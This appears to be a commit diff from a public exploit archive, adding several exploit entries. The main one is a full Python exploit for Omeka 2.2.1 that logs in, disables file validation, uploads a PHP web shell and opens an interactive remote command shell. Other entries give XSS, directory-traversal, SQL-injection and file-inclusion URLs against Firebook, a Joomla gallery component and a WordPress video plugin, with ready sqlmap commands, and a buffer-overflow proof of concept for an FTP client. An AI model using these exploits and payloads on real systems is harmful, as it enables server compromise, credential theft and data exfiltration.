piton = os.path.basename(sys.argv[0])
def bannerche():
print '''
@---------------------------------------------------------------@
| |
| Omeka 2.2.1 Remote Code Execution Exploit |
| |
| |
| ID: ZSL-2014-5194 |
| |
| Copyleft (c) 2014, Zero Science Lab |
| |
@---------------------------------------------------------------@
'''
if len(sys.argv) < 3:
print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname> <path>\n'
print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk omeka\n'
sys.exit()
bannerche()
print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET
host = sys.argv[1]
path = sys.argv[2]
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
try:
opener.open('http://'+host+'/'+path+'/admin/users/login')
except urllib2.HTTPError, errorzio:
if errorzio.code == 404:
print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET
print
sys.exit()
except URLError, errorziocvaj:
if errorziocvaj.reason:
print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET
print
sys.exit()
print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Login please.'
username = raw_input('\x20\x20[*] Enter username: ')
password = raw_input('\x20\x20[*] Enter password: ')
login_data = urllib.urlencode({
'username' : username,
'password' : password,
'remember' : '0',
'submit' : 'Log In'
})
login = opener.open('http://'+host+'/'+path+'/admin/users/login', login_data)
auth = login.read()
for session in cj:
sessid = session.name
print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
cookie = ses_chk.group(0)
print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET
if re.search(r'Login information incorrect. Please try again.', auth):
print '\x20\x20[*] Faulty credentials given '+'.'*30+Fore.RED+'[ER]'+Fore.RESET
print
sys.exit()
else:
print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET
disable_file_validation = urllib.urlencode({
'disable_default_file_validation' : '1',
'submit' : 'Save+Changes'
})
opener.open('http://'+host+'/'+path+'/admin/settings/edit-security', disable_file_validation)
print '\x20\x20[*] Disabling file validation '+'.'*29+Fore.GREEN+'[OK]'+Fore.RESET
class MultiPartForm(object):
def __init__(self):
self.form_fields = []
self.files = []
self.boundary = mimetools.choose_boundary()
return
def get_content_type(self):
return 'multipart/form-data; boundary=%s' % self.boundary
def add_field(self, name, value):
self.form_fields.append((name, value))
return
def add_file(self, fieldname, filename, fileHandle, mimetype=None):
body = fileHandle.read()
if mimetype is None:
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
self.files.append((fieldname, filename, mimetype, body))
return
def __str__(self):
parts = []
part_boundary = '--' + self.boundary
parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"' % name,
'',
value,
]
for name, value in self.form_fields
)
parts.extend(
[ part_boundary,
'Content-Disposition: file; name="%s"; filename="%s"' % \
(field_name, filename),
'Content-Type: %s' % content_type,
'',
body,
]
for field_name, filename, content_type, body in self.files
)
flattened = list(itertools.chain(*parts))
flattened.append('--' + self.boundary + '--')
flattened.append('')
return '\r\n'.join(flattened)
if __name__ == '__main__':
form = MultiPartForm()
form.add_field('public', '1')
form.add_field('submit', 'Add Item')
form.add_file('file[0]', 'thricerbd.php5',
fileHandle=StringIO('<?php echo \"<pre>\"; passthru($_GET[\'cmd\']); echo \"</pre>\"; ?>'))
request = urllib2.Request('http://'+host+'/'+path+'/admin/items/add')
request.add_header('User-agent', 'joxypoxy 2.0')
body = str(form)
request.add_header('Content-type', form.get_content_type())
request.add_header('Cookie', cookie)
request.add_header('Content-length', len(body))
request.add_data(body)
request.get_data()
print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
checkitemid = urllib2.urlopen(request).read()
itemid = re.search('The item #(\d+)', checkitemid).group(1)
print '\x20\x20[*] Getting item ID '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Item ID: '+Fore.YELLOW+itemid+Fore.RESET
checkfileid = opener.open('http://'+host+'/'+path+'/admin/items/show/'+itemid)
fileid = re.search('/admin/files/show/(\d+)', checkfileid.read()).group(1)
print '\x20\x20[*] Getting file ID '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] File ID: '+Fore.YELLOW+fileid+Fore.RESET
print '\x20\x20[*] Getting file name '+'.'*37+Fore.GREEN+'[OK]'+Fore.RESET
checkhash = opener.open('http://'+host+'/'+path+'/admin/files/show/'+fileid)
hashfile = re.search('/files/original/(.+?).php5', checkhash.read()).group(1)
print '\x20\x20[*] File name: '+Fore.YELLOW+hashfile+'.php5'+Fore.RESET
print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET
time.sleep(1)
furl = '/files/original/'+hashfile+'.php5'
print
today = datetime.date.today()
fname = 'omeka-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log'
logging.basicConfig(filename=fname,level=logging.DEBUG)
logging.info(' '+'+'*75)
logging.info(' +')
logging.info(' + Log started: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S'))
logging.info(' + Title: Omeka 2.2.1 Remote Code Execution Exploit')
logging.info(' + Python program executed: '+sys.argv[0])
logging.info(' + Version: '+version)
logging.info(' + Full query: \''+piton+'\x20'+host+'\x20'+path+'\'')
logging.info(' + Username input: '+username)
logging.info(' + Password input: '+password)
logging.info(' + Vector: '+'http://'+host+'/'+path+furl)
logging.info(' +')
logging.info(' + Advisory ID: ZSL-2014-5194')
logging.info(' + Zero Science Lab - http://www.zeroscience.mk')
logging.info(' +')
logging.info(' '+'+'*75+'\n')
print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
raw_input()
while True:
try:
cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)
execute = opener.open('http://'+host+'/'+path+furl+'?cmd='+urllib.quote(cmd))
reverse = execute.read()
pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M)
print Style.BRIGHT+Fore.CYAN
cmdout = pattern.match(reverse)
print cmdout.groups()[0].strip()
print Style.RESET_ALL+Fore.RESET
if cmd.strip() == 'exit':
break
logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n')
except Exception:
break
logging.warning('\n\nLog ended: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')+'\n\nEND OF LOG')
print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Log file: '+Fore.YELLOW+fname+Fore.RESET
print
sys.exit()

11
platforms/php/webapps/34157.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/40941/info
Firebook is prone to multiple cross-site scripting vulnerabilities and directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and other harvested information may aid in launching further attacks.
http://www.example.com/path_to_firebook_admin/?URLproxy=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/guestbook/index.html?answer=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/guestbook/index.html?answer=guestbook/guest/file.html;page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/path_to_firebook_admin/?param=1;show=../.htaccess;
http://www.example.com/guestbook/index.html?answer=guestbook/guest/%2E%2E/index.html

10
platforms/php/webapps/34159.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/40964/info
The Gallery XML Joomla! component is prone to an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; by using directory-traversal strings to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks.
http://www.example.com/index.php?option=com_galleryxml&controller=[LFI]&task=catpics&gcatid=1
http://www.example.com/index.php?option=com_galleryxml&controller=galpic&task=catpics&gcatid=-1 union select 1,2,3,4,5,6,concat(username,char(32),password),8,9,10,11,12 from jos_users -- '

98
platforms/php/webapps/34161.txt Executable file
View file

@ -0,0 +1,98 @@
?Wordpress Video Gallery
######################
# Exploit Title : Wordpress Video Gallery 2.5 SQL Injection and XSS Vulnerabilities
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery
# Software Link : http://downloads.wordpress.org/plugin/contus-video-gallery.2.5.zip ( Fixed :\ )
# Dork Google: inurl:/contus-video-gallery/hdflvplayer/hdplayer.swf
(Click on "Repeat the search with the omitted results included")
# Date : 2014-07-15
# Tested on : Windows 7 / Mozilla Firefox
Windows 7 / sqlmap (0.8-1)
Linux / Mozilla Firefox
Linux / sqlmap 1.0-dev-5b2ded0
######################
# Vulnerability Disclosure Timeline:
2014-07-15: Discovered vulnerability
2014-07-16: Vendor Notification (Support e-mail address)
2014-07-17: Vendor Response/Feedback
2014-07-23: Vendor Fix/Patch (same version number 2.5)
2014-07-24: Public Disclosure
# Description
Wordpress Video Gallery 2.5 suffers from SQL injection and Cross Site Script vulnerabilities
######################
# PoC
# Vulnerablity n°1:
# SQL Injection 1 (Authentication NOT Required):
1) Open the browser and connect to url http://VICTIM/wp-content/plugins/contus-video-gallery/myextractXML.php
2) Copy a video_id number (ex. video_id="1")
3) sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=myextractXML&vid=1" -p vid
[21:02:40] [INFO] GET parameter 'vid' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
...
...
...
[21:03:34] [INFO] GET parameter 'vid' is 'MySQL > 5.0.11 AND time-based blind' injectable
# SQL Injection 2 (Authentication Required):
sqlmap --cookie="INSER_WORDPRESS_COOKIE_HERE" -u "http://VICTIM/wp-admin/admin.php?page=newplaylist&playlistId=1" -p playlistId
sqlmap --cookie="INSER_WORDPRESS_COOKIE_HERE" -u "http://VICTIM/wp-admin/admin.php?page=newvideo&videoId=1" -p videoId
######################
# Vulnerablity n°2:
# XSS Reflected Authenticated (/videoads/videoads.php, /video/video.php, /playlist/playlist.php )
# PoC:
POST
Host=VICTIM
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding=gzip, deflate
Referer=http://VICTIM/wp-admin/admin.php?page=videoads
Cookie=wordpress_b43b255bc018ee66673cd91980a723bf=usertest%7C1405626269%7Ce1559aa048ec23f2ddbb5a40290a3d2e; wp-settings-1=advImgDetails%3Dshow%26libraryContent%3Dupload%26wpfb_adv_uploader%3D1%26editor%3Dtinymce%26uploader%3D1; wp-settings-time-1=1405118515; bLicense54=true; __utma=86855576.2039073811.1404413871.1404413871.1404416567.2; __utmz=86855576.1404413871.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_fid=6EEA54B2DFA4150F-06C135149F70F3D9; wp-settings-time-2=1405287261; wp-settings-2=mfold%3Do%26libraryContent%3Dupload; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-AssetAdmin=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; redux_current_tab=0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_b43b255bc018ee66673cd91980a723bf=usertest%7C1405626269%7Cd8c8ffae7aa7720d4fb3cb56537b1ea7
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=110
POSTDATA=videoadssearchQuery=<script>alert(1)</script>&page=videoads&videoadsearchbtn=Search+Video+Ads
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
#####################

9
platforms/windows/dos/34151.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40885/info
Adobe SVG Viewer is prone to a remote code-execution vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed attacks may cause a denial-of-service condition.
Adobe SVG Viewer 3.03 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/34151.rar

9
platforms/windows/dos/34158.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40945/info
Chrome Engine 4 is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected server, resulting in denial-of-service conditions.
Chrome Engine version 4 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/34158.zip

55
platforms/windows/dos/34162.py Executable file
View file

@ -0,0 +1,55 @@
#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) #
# Date: Jul 24 2014 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.bpftp.com/ #
# Version: 2010.75.0.76 #
# Tested on: Windows XP SP3 #
# CVE: CVE-2014-2973 #
#-----------------------------------------------------------------------------#
'''
(a00.9e4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=41414141 ecx=007ef590 edx=00000000 esi=017a4f6a edi=017a516a
eip=005c005b esp=0012f594 ebp=0012f610 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for bpftpclient.exe -
bpftpclient+0x1c005b:
005c005b f6431c10 test byte ptr [ebx+1Ch],10h ds:0023:4141415d=??
0:000> !exchain
0012f59c: bpftpclient+1c044e (005c044e)
0012f5a8: bpftpclient+1c046b (005c046b)
0012f618: 43434343
Invalid exception stack at 42424242
0:000> g
(a00.9e4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000
eip=43434343 esp=0012f1c4 ebp=0012f1e4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
43434343 ?? ???
'''
#!/usr/bin/python
junk1 = b'\x41' * 89
nSEH = b'\x42' * 4
SEH = b'\x43' * 4
junk2 = b'\x44' * 1000
sploit = junk1 + nSEH + SEH + junk2
try:
print('[+] Creating exploit file...')
f = open('sploit.txt', 'wb')
f.write(sploit)
f.close()
print('[+] Exploit file created successfully!')
except:
print('[!] Error while creating exploit file!')
print('[+] Use the following as Server Name/IP with any user\'s credentials!')
print(sploit.decode())